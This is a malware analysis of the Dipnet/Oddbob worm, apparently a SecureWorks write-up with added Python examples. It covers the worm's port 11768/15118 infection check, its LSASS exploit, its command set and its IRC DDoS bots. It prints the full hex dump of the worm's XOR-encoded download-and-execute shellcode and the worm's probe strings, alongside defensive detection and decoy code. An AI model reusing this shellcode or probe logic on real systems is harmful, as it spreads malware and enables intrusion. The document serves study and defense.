Dipnet/Oddbob Worm Analysis
- URL: http://www.secureworks.com/research/threats/dipnet.html
- Date: January 13, 2005
- Author: Joe Stewart
Dipnet (or Oddbob) is a worm that spreads using the well-known MS04-011 (LSASS) vulnerability that Sasser was based on. Its purpose is to install an IRC DDoS bot. Later variants of Dipnet have attracted attention because of unusual traffic patterns on TCP port 11768 (and, later still, on TCP port 15118).
Analysis
Before Dipnet exploits a host, it first attempts to connect to that host on its check-in port (TCP 11768, or 15118 in later variants) and sends the string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is already infected by Dipnet, it replies with a fixed marker string embedded in the worm body. The latest variant we've seen replies with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3" and then closes the connection. This exchange lets the worm skip hosts that are already running the latest version of the worm software.
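The check-in exchange described above, as an added example (not code from the original SecureWorks write-up): a classifier for captured payloads on the two Dipnet ports, a loopback listener that answers the probe the way an infected host does, and the scanner-side check that decides whether to move on to the exploit. The probe and reply strings and the port numbers are the ones quoted above; the use of the loopback interface and an ephemeral port is an assumption so the demo runs without privileges.

```python
"""Dipnet/Oddbob pre-infection check, modelled on the exchange described above.

Added example; not code from the original SecureWorks write-up. The probe and
reply strings are the ones quoted on the page, as are the ports 11768/15118.
The listener binds to 127.0.0.1 on an ephemeral port (an assumption made so
the demo needs no privileges and collides with nothing).
"""
import socket
import threading

DIPNET_PORTS = (11768, 15118)
PROBE = b"__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123"
INFECTED_REPLY = b"__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3"


def classify_payload(data: bytes, dst_port: int) -> str:
    """Label a captured TCP payload seen on a Dipnet check-in port.

    'probe' is the scanner-side marker, 'infected-reply' is what an infected
    host answers, anything else (or any other port) is 'other'.
    """
    if dst_port not in DIPNET_PORTS:
        return "other"
    if data.startswith(PROBE):
        return "probe"
    if data.startswith(INFECTED_REPLY):
        return "infected-reply"
    return "other"


class DecoyResponder(threading.Thread):
    """Listener that answers the probe exactly as an infected host would.

    A scanner that believes the host already runs the latest worm version
    skips the LSASS exploit attempt. This is an inoculation trick for a
    honeypot or a box that cannot be patched right away, not a substitute
    for applying MS04-011.
    """

    def __init__(self, host="127.0.0.1", port=0):
        super().__init__(daemon=True)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]   # ephemeral port actually bound
        self.seen = []

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            with conn:
                conn.settimeout(2.0)
                try:
                    data = conn.recv(256)
                except socket.timeout:
                    continue
                self.seen.append(data)
                if data.startswith(PROBE):
                    conn.sendall(INFECTED_REPLY)
                # Anything else is closed without an answer, like a non-Dipnet service.


def worm_side_check(host: str, port: int, timeout=2.0) -> bool:
    """Re-create the scanner's pre-check. True means 'already infected, skip'."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(PROBE)
        try:
            reply = s.recv(256)
        except socket.timeout:
            return False
    return reply == INFECTED_REPLY


if __name__ == "__main__":
    decoy = DecoyResponder()
    decoy.start()
    print("decoy listening on 127.0.0.1:%d" % decoy.port)
    print("scanner would skip this host:", worm_side_check("127.0.0.1", decoy.port))
```

Because the reply is a fixed string and arrives before any exploit traffic, the classifier is also a usable IDS signature: a connection to 11768 or 15118 carrying the probe marks a scanning host, and the reply marks one that is already infected.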
If the worm determines that the host is not already infected, or is not running the latest version, it then attempts to exploit the LSASS vulnerability on TCP port 445. The shellcode of the exploit is self-decrypting: the bulk of the code is XORed with 0xFF, both to obfuscate the payload strings and to keep null bytes from prematurely terminating the payload while the affected host copies it in memory. Once decrypted, the shellcode continues running, downloads the worm executable from a remote web server and runs it.
The shellcode as received is shown below. The exploit request carries it as a wide-character string, so in the capture every shellcode byte is followed by a 0x00; the effective code is the sequence of low bytes.
00000000 eb 00 06 00 eb 00 06 00 9b 00 2a 00 f9 00 77 00 |ë...ë.....*.ù.w.|
00000010 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 |................|
00000020 90 00 33 00 c0 00 f7 00 d0 00 8b 00 fb 00 f2 00 |..3.À.÷.Ð...û.ò.|
00000030 af 00 57 00 33 00 c9 00 b1 00 b2 00 90 00 90 00 |¯.W.3.É.±.².....|
00000040 90 00 90 00 80 00 37 00 ff 00 47 00 e2 00 fa 00 |......7.ÿ.G.â.ú.|
00000050 8b 00 ef 00 4d 00 5f 00 57 00 b8 00 30 00 fa 00 |..ï.M._.W.¸.0.ú.|
00000060 b0 00 83 00 f7 00 d0 00 ff 00 d0 00 8b 00 d8 00 |°...÷.Ð.ÿ.Ð...Ø.|
00000070 be 00 f8 00 ff 00 ff 00 ff 00 f7 00 d6 00 33 00 |¾.ø.ÿ.ÿ.ÿ.÷.Ö.3.|
00000080 c0 00 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 57 00 |À...È.÷.Ñ.ò.®.W.|
00000090 53 00 b8 00 56 00 19 00 b1 00 83 00 f7 00 d0 00 |S.¸.V...±...÷.Ð.|
000000a0 ff 00 d0 00 3e 00 89 00 44 00 b5 00 fd 00 4e 00 |ÿ.Ð.>...D.µ.ý.N.|
000000b0 0b 00 f6 00 75 00 e3 00 33 00 c0 00 8b 00 c8 00 |..ö.u.ã.3.À...È.|
000000c0 f7 00 d1 00 f2 00 ae 00 57 00 b8 00 30 00 fa 00 |÷.Ñ.ò.®.W.¸.0.ú.|
000000d0 b0 00 83 00 f7 00 d0 00 ff 00 d0 00 8b 00 d8 00 |°...÷.Ð.ÿ.Ð...Ø.|
000000e0 be 00 f5 00 ff 00 ff 00 ff 00 f7 00 d6 00 ba 00 |¾.õ.ÿ.ÿ.ÿ.÷.Ö.º.|
000000f0 f8 00 ff 00 ff 00 ff 00 f7 00 d2 00 52 00 33 00 |ø.ÿ.ÿ.ÿ.÷.Ò.R.3.|
00000100 c0 00 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 57 00 |À...È.÷.Ñ.ò.®.W.|
00000110 53 00 b8 00 56 00 19 00 b1 00 83 00 f7 00 d0 00 |S.¸.V...±...÷.Ð.|
00000120 ff 00 d0 00 3e 00 89 00 44 00 b5 00 fd 00 5a 00 |ÿ.Ð.>...D.µ.ý.Z.|
00000130 52 00 4e 00 3b 00 f2 00 75 00 e1 00 33 00 c0 00 |R.N.;.ò.u.á.3.À.|
00000140 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 90 00 90 00 |..È.÷.Ñ.ò.®.....|
00000150 33 00 c0 00 66 00 48 00 d1 00 e0 00 33 00 d2 00 |3.À.f.H.Ñ.à.3.Ò.|
00000160 50 00 52 00 ff 00 55 00 01 00 8b 00 f0 00 33 00 |P.R.ÿ.U.....ð.3.|
00000170 d2 00 52 00 52 00 52 00 52 00 57 00 ff 00 55 00 |Ò.R.R.R.R.W.ÿ.U.|
00000180 25 00 33 00 d2 00 52 00 52 00 52 00 52 00 8b 00 |%.3.Ò.R.R.R.R...|
00000190 d7 00 90 00 90 00 90 00 52 00 50 00 ff 00 55 00 |×.......R.P.ÿ.U.|
000001a0 21 00 57 00 33 00 d2 00 66 00 4a 00 d1 00 e2 00 |!.W.3.Ò.f.J.Ñ.â.|
000001b0 52 00 56 00 50 00 ff 00 55 00 1d 00 90 00 90 00 |R.V.P.ÿ.U.......|
000001c0 90 00 33 00 d2 00 52 00 b8 00 f4 00 ff 00 ff 00 |..3.Ò.R.¸.ô.ÿ.ÿ.|
000001d0 ff 00 f7 00 d0 00 8b 00 d5 00 2b 00 d0 00 42 00 |ÿ.÷.Ð...Õ.+.Ð.B.|
000001e0 90 00 90 00 52 00 ff 00 55 00 19 00 ff 00 37 00 |....R.ÿ.U...ÿ.7.|
000001f0 56 00 50 00 8b 00 d8 00 ff 00 55 00 15 00 53 00 |V.P...Ø.ÿ.U...S.|
00000200 ff 00 55 00 11 00 90 00 90 00 90 00 90 00 90 00 |ÿ.U.............|
00000210 33 00 d2 00 42 00 52 00 b8 00 f4 00 ff 00 ff 00 |3.Ò.B.R.¸.ô.ÿ.ÿ.|
00000220 ff 00 f7 00 d0 00 8b 00 d5 00 2b 00 d0 00 42 00 |ÿ.÷.Ð...Õ.+.Ð.B.|
00000230 90 00 90 00 90 00 52 00 ff 00 55 00 09 00 90 00 |......R.ÿ.U.....|
00000240 33 00 d2 00 f7 00 d2 00 c1 00 e2 00 04 00 52 00 |3.Ò.÷.Ò.Á.â...R.|
00000250 ff 00 55 00 05 00 eb 00 f3 00 90 00 87 00 db 00 |ÿ.U...ë.ó.....Û.|
00000260 ff 00 ff 00 ff 00 ff 00 b4 00 ba 00 ad 00 b1 00 |ÿ.ÿ.ÿ.ÿ.´.º...±.|
00000270 ba 00 b3 00 cc 00 cd 00 d1 00 bb 00 b3 00 b3 00 |º.³.Ì.Í.Ñ.».³.³.|
00000280 ff 00 a0 00 93 00 9c 00 8d 00 9a 00 9e 00 8b 00 |ÿ. .............|
00000290 ff 00 a0 00 93 00 88 00 8d 00 96 00 8b 00 9a 00 |ÿ. .............|
000002a0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00 |ÿ. .............|
000002b0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00 |ÿ. .............|
000002c0 ff 00 a8 00 96 00 91 00 ba 00 87 00 9a 00 9c 00 |ÿ.¨.....º.......|
000002d0 ff 00 ac 00 93 00 9a 00 9a 00 8f 00 ff 00 b8 00 |ÿ.¬.........ÿ.¸.|
000002e0 93 00 90 00 9d 00 9e 00 93 00 be 00 93 00 93 00 |..........¾.....|
000002f0 90 00 9c 00 ff 00 a8 00 b6 00 b1 00 b6 00 b1 00 |....ÿ.¨.¶.±.¶.±.|
00000300 ba 00 ab 00 d1 00 bb 00 b3 00 b3 00 ff 00 b6 00 |º.«.Ñ.».³.³.ÿ.¶.|
00000310 91 00 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 b0 00 |..............°.|
00000320 8f 00 9a 00 91 00 be 00 ff 00 b6 00 91 00 8b 00 |......¾.ÿ.¶.....|
00000330 9a 00 8d 00 91 00 9a 00 8b 00 b0 00 8f 00 9a 00 |..........°.....|
00000340 91 00 aa 00 8d 00 93 00 be 00 ff 00 b6 00 91 00 |..ª.....¾.ÿ.¶...|
00000350 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 ad 00 9a 00 |................|
00000360 9e 00 9b 00 b9 00 96 00 93 00 9a 00 ff 00 97 00 |....¹.......ÿ...|
00000370 8b 00 8b 00 8f 00 c5 00 d0 00 d0 00 9e 00 8b 00 |......Å.Ð.Ð.....|
00000380 93 00 9e 00 91 00 8b 00 9c 00 90 00 92 00 92 00 |................|
00000390 9a 00 8d 00 9c 00 9a 00 d1 00 9c 00 90 00 92 00 |........Ñ.......|
000003a0 d0 00 8c 00 8b 00 8a 00 99 00 99 00 d1 00 9a 00 |Ð...........Ñ...|
000003b0 87 00 9a 00 ff 00 88 00 96 00 91 00 9c 00 9a 00 |....ÿ...........|
000003c0 8d 00 d1 00 9a 00 87 00 9a 00 ff 00 88 00 88 00 |..Ñ.......ÿ.....|
000003d0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
000003e0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
000003f0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
00000400 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
00000410 88 00 88 00 88 00 88 00 88 00 88 00 ff 00 |............ÿ.|
The shellcode uses InternetOpenA and WinExec Windows API calls to download and execute a file from a URL. This particular shellcode downloads the file from:
http://atl<blocked>rce.com/stuff.exe
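To see where those API names come from, the following added example (not code from the original write-up) unwraps the wide-character capture printed above and decodes the XOR 0xFF string table the way the shellcode's own stub does: it locates the 0xFFFFFFFF marker at offset 0x260 and XORs what follows. The embedded rows are copied from the capture with the ASCII column dropped; they are cut off after the last import name so that the download URL, which the page redacts, is not reproduced here.

```python
"""Unwrap and decode the string table of the Dipnet download-and-execute shellcode.

Added example, not code from the SecureWorks write-up. CAPTURE_ROWS is copied
from the capture printed above (rows 0x240-0x360, ASCII column removed). The
decoder mirrors the stub's own logic: find the 0xFFFFFFFF marker, then XOR
every byte after it with 0xFF and split on the NUL terminators. The sample is
cut off before the download URL, which the page redacts.
"""

# Constructed sample: rows 0x240-0x360 of the capture above, wide form
# (each payload byte followed by 0x00), truncated after the last API name.
CAPTURE_ROWS = """
00000240 33 00 d2 00 f7 00 d2 00 c1 00 e2 00 04 00 52 00
00000250 ff 00 55 00 05 00 eb 00 f3 00 90 00 87 00 db 00
00000260 ff 00 ff 00 ff 00 ff 00 b4 00 ba 00 ad 00 b1 00
00000270 ba 00 b3 00 cc 00 cd 00 d1 00 bb 00 b3 00 b3 00
00000280 ff 00 a0 00 93 00 9c 00 8d 00 9a 00 9e 00 8b 00
00000290 ff 00 a0 00 93 00 88 00 8d 00 96 00 8b 00 9a 00
000002a0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00
000002b0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00
000002c0 ff 00 a8 00 96 00 91 00 ba 00 87 00 9a 00 9c 00
000002d0 ff 00 ac 00 93 00 9a 00 9a 00 8f 00 ff 00 b8 00
000002e0 93 00 90 00 9d 00 9e 00 93 00 be 00 93 00 93 00
000002f0 90 00 9c 00 ff 00 a8 00 b6 00 b1 00 b6 00 b1 00
00000300 ba 00 ab 00 d1 00 bb 00 b3 00 b3 00 ff 00 b6 00
00000310 91 00 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 b0 00
00000320 8f 00 9a 00 91 00 be 00 ff 00 b6 00 91 00 8b 00
00000330 9a 00 8d 00 91 00 9a 00 8b 00 b0 00 8f 00 9a 00
00000340 91 00 aa 00 8d 00 93 00 be 00 ff 00 b6 00 91 00
00000350 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 ad 00 9a 00
00000360 9e 00 9b 00 b9 00 96 00 93 00 9a 00 ff 00
"""

MARKER = b"\xff\xff\xff\xff"   # what the stub's repne scasd looks for
XOR_KEY = 0xFF                 # the 'xor byte [edi], 0xff' in the decryption loop


def parse_hexdump(rows: str) -> bytes:
    """Turn 'offset b1 b2 ...' rows into bytes, skipping the offset column."""
    out = bytearray()
    for line in rows.strip().splitlines():
        fields = line.split()
        out.extend(int(tok, 16) for tok in fields[1:])
    return bytes(out)


def narrow(wide: bytes) -> bytes:
    """Drop the interleaved 0x00 bytes; refuse input that is not in wide form."""
    if len(wide) % 2 or any(wide[1::2]):
        raise ValueError("not a byte-per-wchar encoding")
    return wide[0::2]


def decode_string_table(shellcode: bytes) -> list[str]:
    """Locate the marker, XOR the tail with 0xFF, split on NUL like the stub's repne scasb."""
    idx = shellcode.find(MARKER)
    if idx < 0:
        raise ValueError("marker not found")
    table = bytes(b ^ XOR_KEY for b in shellcode[idx + len(MARKER):])
    return [s.decode("ascii") for s in table.split(b"\x00") if s]


def imports_from_capture(rows: str = CAPTURE_ROWS) -> dict[str, list[str]]:
    """Group the decoded names under the DLL name that precedes them."""
    grouped, current = {}, None
    for name in decode_string_table(narrow(parse_hexdump(rows))):
        if name.upper().endswith(".DLL"):
            current = name
            grouped[current] = []
        else:
            grouped[current].append(name)
    return grouped


if __name__ == "__main__":
    for dll, funcs in imports_from_capture().items():
        print(dll, "->", ", ".join(funcs))
```

The decoded table is KERNEL32.DLL followed by _lcreat, _lwrite, _lclose, _lclose, WinExec, Sleep and GlobalAlloc, then WININET.DLL followed by InternetOpenA, InternetOpenUrlA and InternetReadFile. The repeated _lclose is in the capture itself rather than a copy error: reading the stub bytes above, the KERNEL32 GetProcAddress loop runs seven times (esi is loaded with the complement of 0xFFFFFFF8) and the WININET loop three, which matches the counts the decoder returns.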
The worm executable sets up its own listener on the check-in port (TCP 11768, or 15118 in later variants) so that future instances of the worm probing the host receive the infected-host reply instead of exploiting it again. It also contacts two different websites to receive additional commands. Commands can be one of the following:
- DIE: delete the worm's registry keys and exit
- DOWNLOAD: download a file via HTTP
- EXEC: execute a file
- RESET: restart the scanner with a new batch of IP address masks
- APPEND: insert additional IP address masks to scan
The first website provides the worm with a list of IP address ranges to scan and exploit. The second website provides the worm with other malware to download and execute. Finally, the worm begins to scan and exploit additional hosts based on the IP address masks given.
At the time of this writing, two additional executables were being served up by the control websites. One is an IRC DDoS bot identified as Backdoor.Win32.IRCBot.k, the other is a backdoor with a kernel-level driver that hides the process, known as Backdoor.Win32.Masteseq.
The DDoS bot connects to a channel on a private IRC server in Russia. At the time of this writing the channel had accumulated between 2800 and 2900 infected hosts.